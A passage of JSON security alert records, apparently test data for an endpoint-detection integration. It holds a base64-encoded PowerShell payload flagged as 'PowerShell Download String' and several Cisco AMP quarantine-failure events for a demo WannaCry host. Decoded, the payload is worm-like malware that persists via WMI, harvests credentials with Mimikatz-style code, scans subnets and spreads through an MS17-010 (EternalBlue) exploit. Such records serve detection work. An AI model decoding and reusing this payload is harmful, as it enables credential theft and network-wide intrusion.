JwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt 